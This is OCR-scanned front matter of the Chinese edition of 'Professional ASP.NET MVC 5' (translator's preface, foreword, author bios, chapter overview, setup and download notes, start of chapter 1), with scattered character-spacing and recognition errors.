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译 者 序 


作为 微软 NET Framework 的 重要 一 部 分 ，ASPNET 自 2002 年 发 布 以 来 ， 迅 速成 为 服务 器 
端 应 用 程序 的 热门 开发 工具 ， 数 以 万 计 使 用 ASPNET 开 发 的 网 站 如 雨后春笋 般 地 出 现在 网 络 
上 ， 越 来 越 多 的 IT 从 业者 使 用 ASPNET 技 术 开 发 网 站 。 

随同 ASPNET 一 起 问世 的 Web Forms 框 架 ， 由 于 其 性 能 稳定 、 高 度 抽 象 、 易 于 上 手 等 特 
点 得 到 了 广大 IT 从 业者 的 青睐 。 随 着 使 用 的 深入 ， 在 大 型 工程 项 目 中 ，Web Forms 框 架 暴 露 
出 了 很 多 缺点 ，Web Forms 根 据 抽象 模型 生成 HTIML 标 记 ， 由 于 不 能 完全 控制 HTML 标记 ， 导 
致 HTML 标 记 宛 余 ， 布 局 混乱 。 此 外 ，ViewState 中 存储 的 数据 可 能 会 远 超 所 需 ， 导 致 HTML 
页 面 加 载 过 慢 ， 最 糟糕 的 一 点 ，Web Forms 不 能 有 效 地 分 离 业 务 逻 辑 和 表现 层 逻 辑 。 在 分 离 
应 用 程序 内 部 关注 点 方面 ，MVC 是 一 种 强大 而 简洁 的 方式 ， 尤 其 在 Web 应 用 程序 中 。 因 此 ， 
为 了 有 效 地 解决 这 些 问题 ， 微 软 ASPNET 团 队 提出 了 一 个 有 效 的 解决 方案 ， 就 是 在 ASPNET 
中 引入 MVC 框 架 ， 这 样 ASPNET MVC 架 构 就 应 运 而 生 了 。 

ASPNETMVC 架 构 降低 了 程序 间 的 耦合 性 ， 测 试 驱动 开发 ， 代 码 重用 性 好 ， 使 用 路 由 机 
制 解析 URL， 并 支持 自 定义 路 由 机 制 和 视图 引擎 。 此 外 ，ASPNET MVC 基 于 CLR 和 成 熟 的 
MVC 架 构 构 建 ， 不 支持 ViewState， 这 就 意味 着 它 没有 自动 状态 管理 机 制 ， 从 而 降低 了 页 面 传 
弟 的 数据 ， 提 高 了 程序 性 能 。 同 时 也 不 支持 服务 器 端 控件 ， 这 样 可 以 实现 完全 控制 HTML， 
可 以 很 容易 地 与 第 三 方 JavaScript 库 集成 开发 。 

自 2009 年 3 月 第 一 版 发 布 以 来 ， 在 过 去 的 5 年 时 间 里 ，ASPNET MVC 已 经 发 布 了 5 个 主要 
版 本 ， 期 间 还 有 很 多 临时 版 本 。 升 级 速度 如 此 之 快 ， 这 与 开发 人 员 使 用 率 是 分 不 开 的 ， 市 场 
需求 和 反馈 带动 了 技术 的 步 步 升级 ， 甚 至 革新 。 相 对 于 第 4 版 ， 本 书 新 增 了 第 12 章 “应 用 
AngularJS 构 建 单 页面 应 用 程序 ”和 附录 部 分 。 其 中 第 12 章 结合 一 个 示例 Web 应 用 程序 介绍 了 
第 三 方 JavaScript 库 AngularJS, 如 何 构建 Web API, 以 及 如 何 结合 AngularJS 构 建 Web 应 用 程序 。 
附录 A 主要 介绍 了 ASPNET MVC 5.1 的 常用 功能 。 例 如 ，Enum 支 持原 理 ， 如 何 使 用 自 定义 约 
束 执行 特性 路 由 ， 以 及 Bootsttap 和 JavaScript 增 强 的 使 用 方法 等 。 

书籍 给 出 了 方法 ， 检 验方 法 是 否 有 效 的 途径 就 是 实践 。 行 胜 于 言 ， 从 书 中 学 习 的 方法 ， 
一 定 要 在 实践 中 应 用 检验 。 这 一 点 在 计算 机 学 科 中 尤为 重要 。 如 果 只 是 通过 读书 学 习 技术 架 
构 , 而 没有 在 工程 应 用 中 实践 , 这 样 不 足以 对 技术 架构 有 刻骨 铭 心 的 理解 , 不 会 发 现 ASPNET 
MVC 架 构 的 精妙 ， 当 然 也 不 会 发 现 其 中 的 不 足 ， 不 能 为 ASPNET MVC 的 下 一 次 升级 完善 作 
贡献 。 

在 这 里 要 感谢 清华 大 学 出 版 社 的 编辑 们 ， 他 们 对 本 书 的 翻译 校正 投入 了 巨大 的 心血 。 他 
们 对 工作 的 热情 和 一 丝 不 苟 的 工作 态度 深 深 地 感染 着 我 ， 我 有 幸 能 够 翻译 《ASPNET MVC 3 
高 级 编程 (第 3 版 )》、《ASPNET MVC 4 高 级 编程 (第 4 版 )》 和 《ASPNET MVC 5 高 级 编程 (第 5 
版 )》 并 顺利 交 稿 , 与 他 们 的 鼓励 和 帮助 是 分 不 开 的 。 厦 门 大 学 的 邹 权 教 授 对 我 翻译 (ASPNET 
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MVC 4 高 级 编程 (第 4 版 )》 也 提供 了 很 多 帮助 ， 并 参与 了 部 分 翻译 工作 。 最 后 ， 感 谢 对 我 工 
作 学 习 一 直 全 力 支持 的 父母 和 妹妹 ， 还 有 所 有 帮助 支持 我 的 人 。 

本 书 全 部 章节 由 孙 远 帅 翻译 ， 参 与 本 次 翻译 活动 的 还 有 孔 祥 亮 、 陈 跃 华 、 杜 思 明 、 熊 晓 
条、 曹 汉 鸣 、 陶 晓 云 、 王 通 、 方 峻 、 李 小 凤 、 曹 晓 松 、 蒋 晓 冬 、 印 培 强 、 洪 妍 、 李 亮 辉 、 高 
娟 妮 、 草 小 震 、 陈 笑 。 在 此 一 并 表示 感谢 ! 

对 于 本 书 的 翻译 工作 ， 我 力求 做 到 “ 信 、 达 、 雅 ” 限于 本 人 水 平 有 限 ， 翻 译 不 足 之 处 ， 
还 请 不 音 赐教 ， 不 胜 感激 ! 
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我 很 高 兴 能 为 本 书写 序 , 本 书 介 绍 了 最 新 发 布 的 ASPNET MVC 版 本 , 并 由 一 支 优秀 的 作 
者 团队 编写 。 本 书 的 作者 都 是 我 的 好 友 ， 他 们 都 是 非常 优秀 的 技术 专家 。 

Jon Galloway 是 专注 于 Azure 和 ASPNET 的 技术 传道 人 。 处 在 这 个 角色 ， 使 他 有 机 会 接触 
成 千 上 万 的 或 者 新 接触 、 或 者 十 分 熟悉 ASPNET MVC 的 开发 人 员 。 他 负责 编写 了 MVC Music 
Store 教 程 ， 该 教程 帮助 成 千 上 万 的 开发 人 员 编写 了 他 们 的 第 一 个 ASPNET MVC 应 用 程序 。 他 
与 各 种 ASPNET 社 区 的 互动 使 得 他 拥有 很 强 的 洞察 力 ， 知 道 开发 人 员 如 何 开 始 、 学 习 和 掌握 
ASPNET MVC. 

Brad Wilson 不 仅 是 我 最 爱 的 怀疑 论 者 ， 而 且 他 在 Microsoft 任 职 期 间 ， 也 帮助 构建 了 几 个 
版 本 的 ASPNET MVC。 从 动态 数据 到 数据 注解 ， 再 到 测试 等 ， 没 有 作为 程序 员 的 Brad 干 不 了 
的 事 。 他 从 事 过 许多 开源 项 目 (如 XUnit NET)， 并 继续 推动 Microsoft 公 司 的 内 部 和 外 部 人 员 
走向 光明 。 

Phil Haack 是 ASPNET MVC 项 目 经 理 , 他 从 一 开始 就 参与 该 项 目 。 因为 他 有 植 根 于 社区 
和 开源 的 背景 ， 所 以 我 一 直 认 为 他 不 仅 是 一 名 优秀 的 技术 人 员 ， 而 且 还 是 我 的 一 位 亲密 的 朋 
友 。 在 Microsoft 工 作 期 间 ，Phil 还 从 事 新 的 .NET 包 管理 器 NuGet 的 开发 。 

David Matson 在 本 书 这 一 版 中 加 入 了 作者 团队 。 他 是 Microsoft 的 一 名 高 级 开发 人 员 ， 带 
来 了 关于 ASPNETMVC 和 Web API 的 新 特性 的 大 量 详 尽 信息 ， 因 为 他 帮助 开发 了 这 些 技术 。 
David 为 本 书 这 一 版 带 来 了 深刻 的 技术 知识 和 指导 。 

最 后 也 是 相当 重要 的 是 ，K. Scott Allen 增 强 了 团队 的 力量 ， 不 仅仅 是 因为 他 明智 地 决定 
使 用 他 听 起 来 更 加 智能 的 中 间 名 , 而 且 也 因为 他 带 来 了 一 名 世界 级 著名 培训 师 的 经 验 和 智慧 。 
Scott Allen 是 Pluralsight 技 术 团队 中 的 一 员 ， 兽 经 在 财富 50 强 公司 从 事 网 站 和 创业 咨询 方面 的 
工作 。 他 善良 、 体 贴 、 值 得 尊重 ， 重 要 的 是 他 非常 透彻 地 了 解 自己 。 

随 着 ASPNET Web 开 发 平台 的 发 展 ， 这 些 伙计 团结 在 一 起 共同 把 《ASPNET MVC 5 高 级 
编程 (第 5 版 )》 一 书 推 升 到 了 一 个 新 的 高 度 。 该 平台 目前 正在 由 全 球 数 百 万 的 开发 人 员 使 用 。 
一 个 充满 朝气 的 社区 支持 该 平台 的 在 线 版 和 离线 版 ， 线 上 论坛 (www.asp.neb 平 均 每 天 都 有 成 
千 上 万 的 问答 。 

ASPNET 和 ASPNET MVC 5 的 应 用 面 很 广 , 像 新 闻 网 站 、 网 上 零售 商店 以 及 我 们 最 喜欢 的 
社交 网 站 。 除 此 之 外 , 或 许 我 们 当地 的 运动 队 、 读书 俱乐部 或 博客 使 用 的 也 是 ASPNET MVC 5。 

当 ASPNET MVC 刚 刚 被 引入 时 ， 它 打破 了 很 多 领域 。 尽 管 使 用 的 是 旧 模 式 ， 但 是 这 些 
模式 对 于 现 有 的 ASPNET 社 区 来 说 都 是 新 的 ， 它 在 生产 率 和 控制 、 功 能 和 灵活 性 之 间 求 得 了 
微妙 平衡 。 今 天 ， 对 我 来 说 ，ASPNET MVC 5 代表 了 选择 一 一 语言 的 选择 、 框 架 的 选择 、 开 
源 库 的 选择 、 模 式 的 选择 。 一 切 都 是 可 插 拔 的 。ASPNET MVC 5 是 我 们 对 环境 绝对 控制 的 缩 
影 一 -如 果 喜 欢 ， 就 使 用 ， 如 果 不 喜 欢 ， 就 改变 。 我 们 可 以 按照 自己 想 要 的 方式 进行 单元 测 
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试 ， 创 建 自己 想 要 的 组 件 ， 使 用 自己 选择 的 JavaScript 框 架 。 

ASPNET MVC 5 中 最 令 人 振奋 的 更 新 可 能 就 是 引入 了 One ASPNET 的 概念 。 在 这 个 版 本 
中 , 我 们 很 容易 开发 混合 应 用 程序 , 并 在 ASPNET MVC 和 Web Forms 之 间 共 享 代码 。 ASPNET 
MVC 运 行 在 公共 的 ASPNET 核 心 组 件 之 上 ， 例 如 ASPNET Identity、ASPNET Scaffolding 和 
Visual Studio New Project 体 验 。 这 意味 着 我 们 可 以 跨 平 台 运 用 我 们 的 ASPNET 技 能 ， 不 管 这 
些 平台 是 ASPNET MVC, Web Forms, Web Pages, Web API 还 是 SignalR。 这 些 更 新 设计 了 扩 


展 点 ， 


于 与 其 他 框架 (如 NancyFX 和 ServiceStack) 共 享 代码 和 库 。 


我 建议 到 www.asp.netmvc 上 下 载 最 新 的 内 容 ， 以 及 最 新 的 示例 、 视 频 和 教程 。 


我 们 


希望 本 书 讲解 的 内 容 能 够 使 你 精通 ASPNET MVC 5 历程 中 的 下 一 步 。 


— Scott Hanselman 
Microsoft Azure Web 团 队 首席 社区 架构 师 
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Brad Wilson 是 有 超过 20 年 经 验 的 软件 开发 工程 师 ， 做 过 顾问 、 开 发 人 员 、 团 队 组 长 、 架 
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在 不 工作 的 时 候 ， 他 是 一 名 狂热 的 音乐 家 、 扑 克 玩 家 和 摄影 师 。 


K. Scott Allen 是 OdeToCode 有 限 责任 公司 的 创始 人 ， 同 时 也 是 一 名 软件 顾问 。Scott 拥 有 
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David Matson 是 Microsoft 公 司 的 高 级 软件 开发 人 员 , 也 是 MVC 5 和 Web API2 开 发 团队 的 
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Phil Haack 是 第 3 章 、 第 9 章 和 第 10 章 的 原作 者 。 他 从 事 GitHub 项 目 ， 努 力 使 Git 和 GitHub 
对 Windows 上 的 开发 人 员 更 友好 ， 更 容易 接受 。 在 加 入 GitHub 之 前 ，Phil 是 ASPNET 团 队 的 一 
名 高 级 项 目 经 理 , 和 ASPNET 团 队 一 起 从 事 于 ASPNET MVCARINuGeUJI H « fE73— 4 [13 38 
君子 ” Phil 喜 欢 设计 软件 。 他 不 仅 喜 欢 编写 软件 ， 还 喜欢 撰写 关于 软件 和 软件 管理 的 博客 ， 
他 的 博客 网 址 为 http://haacked.com/。 


技术 编辑 简介 


Eilon Lipton 在 2002 年 作为 一 名 开发 人 员 加 入 了 Microsoft 公 司 的 ASPNET 团 队 。 在 
ASPNET 团 队 里 ， 他 既 做 过 数据 源 控件 ， 也 做 过 UpdatePanel 控 件 的 本 地 化 工作 。 他 现在 是 


ASPNET 团 队 的 开发 经 理 


， 从 事 开 源 项 目 工作 , 包括 ASPNET MVC, Web API, Web Pages with 


Razor. SignalR, Entity Framework 和 Orchard CMS。Eilon 在 各 种 有 关 ASPNET 主 题 的 全 球 会 
议 上 发 表演 讲 。 他 从 波士顿 大 学 毕业 ， 并 获得 数学 和 计算 机 科学 双 学 位 。 在 业余 时 间 ，Eilon 


喜欢 在 他 的 车 库 里 制作 一 


些 家 具 。 如果 知 道 有 谁 需要 一 个 3 英尺 左右 高 的 茶几 , 可 以 给 他 发 一 


封 邮件 。Eilon 和 他 的 太太 很 喜欢 搭建 乐高 模型 ， 以 及 拼 七 巧 板 。 


Peter Mourfield 是 TaxSlayer 的 软件 工程 主管 ， 负 责 保证 团队 采用 了 最 好 的 软件 过 程 、 架 


构 和 技术 。Peter 在 软件 社 


区 会 议 上 发 表演 讲 ， 是 ASP 和 Azure Insiders 的 成 员 ， 并 且 为 许多 开 


源 项 目 做 出 了 贡献 ， 包 括 NerdDinner 和 MvvmCross。 
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感谢 我 的 家 人 和 朋友 ， 他 们 给 了 我 良好 的 精神 状态 。 感 谢 整个 ASPNET 团 队 ， 自 2002 年 
以 来 ， 他 们 给 我 带 来 了 无 穷 的 工作 乐趣 。 最 后 感谢 Philippians 时 刻 提 醒 我 哪 种 方式 是 正确 的 。 


一 一 Jon Galloway 


Di} 


对 于 一 名 ASPNET 开 发 人 员 来 说 ， 这 是 一 个 伟大 的 时 刻 ! 

无 论 是 对 于 已 经 拥有 ASPNET 多 年 开发 经 验 的 开发 人 员 ， 还 是 对 于 刚刚 入 门 的 初学 者 ， 
现在 都 是 深入 学 习 ASPNET MVC 的 绝 佳 时 机 。ASPNET MVC 从 一 开始 就 有 很 多 乐趣 ， 但 最 
近 两 个 版 本 添加 了 许多 特性 ， 使 整个 开发 过 程 变 得 非常 愉悦 。 

ASPNET MVC 3 带 来 了 像 Razor 视 图 引擎 这 样 的 新 特性 ， 与 NuGet 包 管理 系统 和 jQuery 内 
置 整合 来 简化 Ajax 开 发 。ASPNET MVC 5 继续 这 一 趋势 ， 添 加 了 更 新 的 可 视 化 设计 、 移 动 
Web 支 持 、 使 用 ASPNET Web API 的 HTTP 服 务 、 内 置 支持 OAuth 与 流行 网 站 的 整合 等 。 这 样 
我 们 就 可 以 快速 地 开始 使 用 全 功能 Web 应 用 程序 。 

这 也 不 是 简单 地 利用 拖 放 功能 提高 短期 生产 率 。 这 一 切 都 建立 在 一 个 基于 模式 的 Web 框 
架 上 ， 当 需要 时 ， 这 个 框架 可 帮助 我 们 控制 应 用 程序 的 每 个 方面 。 

加 入 我 们 会 踏 上 有 趣 翔实 的 ASPNET MVC 5 之 旅 ! 


本 书 读者 对 象 


本 书 由 浅 入 深 地 介绍 ASPNET MVC， 是 一 本 优秀 的 ASPNET MVC 教 程 。 

如 果 刚 刚 接触 ASPNET MVC， 本 书 首先 会 帮助 学 习 MVC 概 念 ， 然 后 演示 如 何在 应 用 代 
码 示 例 中 应 用 这 些 概念 。 本 书 作者 已 经 指导 成 千 上 万 名 开发 人 员 开 始 学 习 ASPNET MVC， 指 导 
怎样 安排 结构 思路 ， 以 便 快速 创建 ， 入 门 开 发 。 

我 们 知道 许多 读者 都 熟悉 ASPNET Web Forms， 在 一 些 上 下 文中 ， 我 们 介绍 它们 之 间 的 
异同 来 帮助 理解 它们 之 间 的 关系 。 事实 上 ，ASPNET MVC 5 不 是 ASPNET Web Forms 的 替换 
品 。 许 多 Web 开 发 人 员 也 使 用 其 他 Web 框 架 ， 比 如 Ruby on Rails. Node.js, Django, 一 些 PHP 
框架 等 ， 这 些 框架 都 适用 于 MVC( 模 型 -视图 -控制 器 ，Model-View-Controllen) 应 用 模式 。 如 果 
你 属于 这 类 开发 人 员 ， 或 者 只 是 好 奇 ， 本 书 就 适合 你 。 

我 们 也 付出 了 很 大 努力 , 确保 本 书 能 够 为 拥有 ASPNET MVC 经 验 的 开发 人 员 提供 一 些 帮 
助 。 在 本 书 的 各 个 章节 ， 我 们 介绍 了 组 件 设计 原理 ， 以 及 如 何 最 好 地 使 用 它们 。 我 们 添加 了 
新 的 内 容 , 包括 大 大 扩展 了 介绍 路 由 的 一 章 , 以 介绍 ASPNET MVC 5 中 新 增 的 特性 路 由 功能 。 
我 们 还 利用 从 NuGet Gallery 开 发 团队 那里 直接 得 到 的 知识 ， 更 新 了 最 后 一 章 的 NuGet Gallery 
案例 分 析 ， 解 释 了 NuGet 开 发 团队 如 何 构建 和 开发 真实 世界 中 高 容量 的 ASPNETMVC 网 站 。 
另外 ，K. Scott Allen 还 新 撰写 了 一 章 ， 解 释 了 如 何 使 用 AngularJS 构 建 单 页 面 应 用 程序 。 
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本 书 组 织 结构 


本 书 分 为 两 大 部 分 , 每 部 分 由 几 个 章节 构成 。 前 6 章 主 要 介绍 了 MVC 模 式 , 以 及 ASPNET 
MVC 是 如 何 实现 MVC 模 式 的 。 

第 1 章 “ 入 门 ”帮助 你 开始 进行 ASPNET MVC 5 开发 。 首先 介绍 了 ASPNET MVC 的 概念 ， 
然后 解释 ASPNET MVC 5 如 何 顺应 以 前 的 发 布 版 本 。 最 后 ， 在 确保 正确 安装 软件 之 后 ， 帮 助 
你 开始 创建 你 的 第 一 个 ASPNET MVC 5 应 用 程序 。 

第 2 章 “ 控 制 器 ”讲解 控制 器 和 操作 的 基础 内 容 。 你 开始 编写 一 些 基本 的 “hello world" 
示例 ， 然 后 创建 从 URL 中 提取 信息 并 在 屏幕 上 显示 应 用 程序 。 

第 3 章 “ 视 图 ”介绍 如 何 从 控制 器 操作 中 使 用 视图 模板 控制 输出 的 可 视 化 表示 。 此 外 ， 
还 会 全 面 地 介绍 Razor 视 图 引擎 ， 其 中 包括 帮助 组 织 和 维护 的 语法 和 特征 。 

第 4 章 “ 模 型 ”帮助 你 学 习 如 何 使 用 模型 在 控制 器 和 视图 之 间 传 递 信 息 ， 以 及 如 何 使 用 
Entity Framework 的 Code First 开 发 集成 数据 库 和 模型 。 

第 5 章 “ 表 单 和 HTML 辅 助 方法 ”深入 介绍 编辑 情形 ， 解 释 ASPNET MVC 处 理 表单 的 方 
式 。 你 将 从 本 章 中 学 习 到 如 何 使 用 HTML 辅 助 方法 精简 视图 。 

第 6 章 “ 数 据 注解 和 验证 ”介绍 如 何 使 用 特性 定义 模型 显示 、 编 辑 和 验证 的 规则 。 

接 下 来 的 10 章 以 前 面 的 内 容 为 基础 ， 介 绍 了 一 些 更 加 高 级 的 概念 和 应 用 程序 。 

第 7 章 “ 成 员 资格 、 授 权 和 安全 性 ”介绍 如 何 确保 ASPNET MVC 应 用 程序 安全 ， 并 指出 
常见 的 安全 陷阱 以 及 避 开 这 些 陷阱 的 方法 。 此 外 ,你 还 会 学 习 到 如 何 利用 ASPNET MVC 应 用 
程序 中 的 ASPNET 成 员 资 格 和 授权 特性 来 控制 访问 权限 。 另 外 还 将 学 到 新 增 的 ASPNET 
Identity 系 统 的 重要 信息 。 

第 8 章 “Ajax” 介 绍 ASPNET MVC 应 用 程序 中 的 Ajax 程序 ， 并 特别 强调 jQuery 和 jQuery 
插件 。 本 章 中 ， 你 将 会 学 习 到 如 何 使 用 ASPNET MVC 的 Ajax 辅助 方法 ， 以 及 如 何 高 效 地 应 用 
jQuery 验证 系统 。 

第 9 章 “ 路 由 ”深入 介绍 用 来 管理 如 何 将 URL 映 射 到 控制 器 操作 的 路 由 机 制 。 本 章 介 绍 
了 传统 路 由 和 新 增 的 特性 路 由 ， 展 示 了 如 何 结合 使 用 这 两 种 路 由 ， 并 解释 了 两 种 路 由 的 适用 
场合 。 

第 10 章 “NuGet” 介 绍 NuGet 包 管理 系统 。 通 过 本 章 内 容 ， 你 将 学 习 到 如 何 将 NuGet 关 联 
到 ASPNET MVC， 如 何 安装 NuGet 以 及 如 何 使 用 NuGet 来 安装 、 更 新 和 创建 新 包 。 

第 11 章 “ASPNET Web API” 展 示 如 何 使 用 ASPNET Web API 创 建 HTTP 服 务 。 

第 12 章 “应 用 AngularJS 构 建 单 页 面 应 用 程序 ”介绍 如 何 将 ASPNET MVC 技 能 和 Web API 
技能 与 流行 的 AngularJS 库 结合 起 来 使 用 ， 创 建 出 单 页 面 应 用 程序 。 另 外 还 提供 了 一 个 有 趣 的 

“At The Movies” 示 例 应 用 程序 。 
第 13 章 “依赖 注入 ”介绍 依赖 注入 以 及 如 何在 应 用 程序 中 利用 依赖 注入 。 
第 14 章 “单元 测试 ” 教 你 如 何在 ASPNET 应 用 程序 中 使 用 测试 驱动 开发 ， 并 提供 编写 高 
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效 测试 的 一 些 有 益 忠告 。 

第 15 章 “扩展 ASPNET MVC” 深 入 讲解 ASPNET MVC 中 的 扩展 点 , 并 展示 如 何 扩 展 MVC 
框架 来 满足 你 的 具体 需求 。 

第 16 章 “高 级 主题 ”介绍 一 些 高 级 主题 ， 这 些 主题 在 阅读 本 书 前 15 章 之 前 讲解 可 能 会 使 
你 感到 吃力 。 本 章 涵盖 Razor、 基 架 系统 、 路 由 机 制 、 模 板 和 控制 器 的 一 些 复杂 应 用 。 

第 17 章 “ASPNET MVC 实 战 : 构建 NuGetorg 网 站 ”结合 学 习 的 每 个 知识 点 来 进行 NuGet 
Gallery 网 站 (http://nuget.org) 案 例 研 究 。 在 这 里 ， 你 会 学 习 到 ， 当 使 用 ASPNET MVC 构 建 高 性 
能 网 站 时 ， 高 级 ASPNET 工 程 师 处 理 测试 、 成 员 资 格 、 部 署 和 数据 迁移 的 方法 。 


经 验 丰富 的 读者 请 注意 : 

本 书 前 6 章 的 节奏 有 点 慢 。 这 些 章节 介绍 了 ASPNET MVC 中 的 一 些 基本 概念 ， 并 假定 读 
者 没有 多 少 相关 经 验 。 如 果 读 者 已 经 熟悉 了 MVC， 可 以 快速 浏览 前 几 章 。 从 第 7 章 开始 ， 讲 
解 速度 将 会 加 快 。 


使 用 本 书 的 条 件 


为 使 用 ASPNET MVC 5， 你 可 能 需要 安装 Visual Studio。 可 以 使 用 Microsoft Visual Studio 
Express 2013 的 Web 版 或 Visual Studio 2013 的 任何 付费 版 本 (如 Visual Studio 2013 Professional)。 
Visual Studio 2013 中 包含 了 ASPNET MVC 5。 可 以 从 以 下 网 址 下 载 Visual Studio 和 Visual 
Studio Express: 

e Visual Studio: www.microsoft.com/vstudio 

e Visual Studio Express: www.microsoft.com/express/ 

也 可 以 在 Visual Studio 2012 中 使 用 ASPNET MVC 5. ASP.NET MVC 5 包含 在 Visual Studio 
2012 的 ASPNET 和 Web Tools 更 新 中 ， 下 载 地 址 如 下 : 

e ASP.NET and Web Tools 2013.2 for Visual Studio 2012: http://www.microsoft.com/ 

en-us/download/41532 


第 1 章 详细 介绍 了 软件 需求 ， 并 演示 了 如 何在 开发 机 和 服务 器 上 安装 。 


源 代 码 


整 本 书 中 ， 你 会 注意 到 ， 当 建议 你 安装 NuGet 包 以 尝试 一 些 样 例 代码 时 ， 我 们 会 放置 如 
下 标识 : 


Install-Package SomePackageName 


NuGet 是 Outercurve Foundation 为 NET 和 Visual Studio 而 编写 的 包 管理 器 ， 后 来 被 
JMicrosoft 公 司 整合 到 了 ASPNET MVC 中 。 

我 们 不 必 再 在 Wrox 网 站 上 搜索 源 代码 示例 的 压缩 文件 了 ， 因 为 我 们 可 以 通过 使 用 NuGet 
轻松 地 把 这 些 文件 添加 到 ASPNET MVC 应 用 程序 中 。 我 们 认为 自 此 尝试 样 例 将 不 再 痛苦 , 而 
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变 得 更 容易 、 更 方便 。 第 10 章 将 详细 介绍 NuGet 系 统 。 

如 果 你 想 下 载 NuGet 包 ， 以 便 在 以 后 不 能 上 网 时 使 用 ， 这 些 包 也 可 以 从 wwwwrox.com 下 
载 。 登 录 该 网 站 之 后 ， 只 需要 使 用 Search 框 或 标题 列表 中 的 一 个 找到 书 的 标题 ， 单 击 本 书 详 
细 页 面 上 的 Download Code 链 接 ， 即 可 下 载 本 书 涉 及 的 所 有 源 代 码 。 另 外 ， 也 可 从 
http://www.tupwk.com.cn/downpage 下 载 本 书 的 源 代码 。 


由 于 许多 图 书 的 标题 都 很 类 似 ， 所 以 按 ISBN 搜 索 是 最 简单 的 ; 本 书 英文 版 
的 ISBN 是 978-1-118-79475-3。 


在 下 载 了 代码 后 ， 只 需要 用 自己 喜欢 的 解压 缩 软件 对 它们 进行 解压 缩 即 可 。 另 外 ， 也 可 
以 进入 http://www.wrox.com/dynamic/books/download.aspx 上 的 Wrox 代 码 下 载 页 面 ， 查 看 本 书 
和 其 他 Wrox 图 书 的 源 代码 。 


勘误 表 


尽管 我 们 已 经 尽 了 各 种 努力 来 保证 文章 或 代码 中 不 出 现 错误 ， 但 是 错误 总 是 难免 的 ， 如 
果 你 在 本 书 中 找到 了 错误 ， 例 如 拼写 错误 或 代码 错误 ， 请 告诉 我 们 ， 我 们 将 非常 感激 。 通 过 
勘误 表 ， 可 以 让 其 他 读者 避免 受挫 ， 当 然 ， 这 还 有 助 于 提供 更 高 质量 的 信息 。 

请 给 wkservice@vip.163.com 发 电子 邮件 ， 我 们 就 会 检查 你 的 信息 ， 如 果 是 正确 的 ， 我 们 
将 在 本 书 的 后 续 版 本 中 采用 。 

要 在 网 站 上 找到 本 书 的 勘误 表 , 可 以 登录 http://www.wrox.com, 通过 Search 框 或 书 名 列表 
查找 本 书 ， 然 后 在 本 书 的 详细 页 面 上 ， 单 击 Errata 链 接 。 在 这 个 页 面 上 可 以 查看 到 Wrox 编 辑 已 提 
交 和 粘贴 的 所 有 勘误 项 。 完 整 的 图 书 列表 还 包括 每 本 书 的 勘误 表 ， 网 址 是 


WWW.Wrox.com/misc-pages/booklist.shtml . 


p2p.wrox.com 


要 与 作者 和 同行 讨论 ， 请 加 入 p2p.wrox.com 上 的 P2P 论 坛 。 这 个 论坛 是 一 个 基于 Web 的 系 
统 ， 便 于 你 张贴 与 Wrox 图 书 相关 的 消息 和 相关 技术 ， 与 其 他 读者 和 技术 用 户 交流 心得 。 该 论 
坛 提供 了 订阅 功能 ， 当 论坛 上 有 新 的 消息 时 ， 它 可 以 给 你 传送 感 兴趣 的 论题 。Wrox 作 者 、 编 
辑 和 其 他 业界 专家 和 读者 都 会 到 这 个 论坛 上 探讨 问题 。 

在 http://p2p.wrox.com 上 ， 有 许多 不 同 的 论坛 ， 它 们 不 仅 有 助 于 阅读 本 书 ， 还 有 助 于 开发 
自己 的 应 用 程序 。 要 加 入 论坛 ， 可 以 遵循 下 面 的 步 又 : 

(1) 进入 p2p.wrox.com， 单 击 Register 链 接 。 

(2) 阅读 使 用 协议 ， 并 单 击 Agree 按 钮 。 

(3) 填写 加 入 该 论坛 所 需要 的 信息 和 自己 希望 提供 的 其 他 信息 ， 单 击 Submit 按 钮 。 

(4) 你 会 收 到 一 封 电子 邮件 ， 其 中 的 信息 描述 了 如 何 验 证 账户 ， 完 成 加 入 过 程 。 


XI 


XII 


ASP.NET MVC 5 高 级 编程 (第 5 版 ) 


不 加 入 P2P 也 可 以 阅读 论坛 上 的 消息 ,但 要 张贴 自己 的 消息 ， 就 必须 加 入 该 
论坛 。 


加 入 论坛 后 ， 就 可 以 张贴 新 消息 ， 响 应 其 他 用 户 张贴 的 消息 。 可 以 随时 在 Web 上 阅读 消 
息 。 如 果 要 让 该 网 站 给 自己 发 送 特定 论坛 中 的 消息 ， 可 以 单 击 论坛 列表 中 该 论坛 名 旁边 的 
Subscribe to this Forum 图 标 。 

关于 使 用 Wrox P2P 的 更 多 信息 ， 可 阅读 P2P FAQ， 了 解 论坛 软件 的 工作 情况 以 及 P2P 和 
Wrox 图 书 的 许多 常见 问题 。 要 阅读 FAQ， 可 以 在 任意 P2P 页 面 上 单 击 FAQ 链 接 。 
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本 章 主要 内 容 

e 理解 ASPNET MVC 

e ASP.NET MVC 5 概述 

e ASP.NET MVC 5 应 用 程序 的 创建 方法 
e ASP.NET MVC 5 应 用 程序 的 结构 


本 章 将 简明 扼要 地 介绍 ASPNET MVC, 解释 ASPNET MVC 5 如 何 适应 ASPNET MVC 的 
发 布 历程 , 总 结 ASPNET MVC 5 的 新 特性 ， 并 介绍 如 何 配置 ASPNET MVC 5 应 用 程序 的 开发 

本 书 是 关于 Web 框 架 第 5 版 的 专业 系列 书籍 之 一 ， 因 此 对 Web 框 架 只 做 简要 介绍 。 本 书 不 
会 浪费 笔墨 来 说 服 读者 学 习 ASPNET MVC， 因 为 我 们 认为 你 购买 本 书 的 目的 就 是 为 了 学 习 
ASP.NET MVC. 证 明 软件 框架 和 模式 价值 最 好 的 方法 就 是 展示 它们 在 实际 场景 中 的 应 用 , 因 
此 ， 这 方面 会 重点 予以 介绍 。 


1.1 ASP.NET MVCN 


ASPNET MVC 是 一 种 构建 Web 应 用 程序 的 框架 ， 它 将 一 般 的 MVC(Model-View-Controller) 
模式 应 用 于 ASPNET 框 架 。 下 面 首先 介绍 ASPNET MVC 和 ASPNET 框 架 之 间 的 关系 。 


1.1.1 ASP.NET MVC 如 何 适应 ASP.NET 


在 2002 年 ASPNET 1.0 首 次 发 布 时 ， 人 们 很 容易 将 ASPNET 和 Web Forms 看 成 同一 事物 。 
尽管 当时 ASPNET 已 经 支持 两 层 抽象 ， 具 体 如 下 : 
e System.Web.Ul: Web Forms 层 ， 由 服务 器 控件 和 ViewState 等 组 成 。 
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e System Web: 管道 程序 , 提供 基本 的 Web 堆 栈 , 其 中 包括 组 件 模块 、 处 理 程序 和 HTTP 
堆栈 等 。 

应 用 ASPNET 开 发 的 主流 方法 圳 括 了 整个 Web Forms 堆 栈 一 一 利用 拖 放 服 务 器 控件 ， 有 
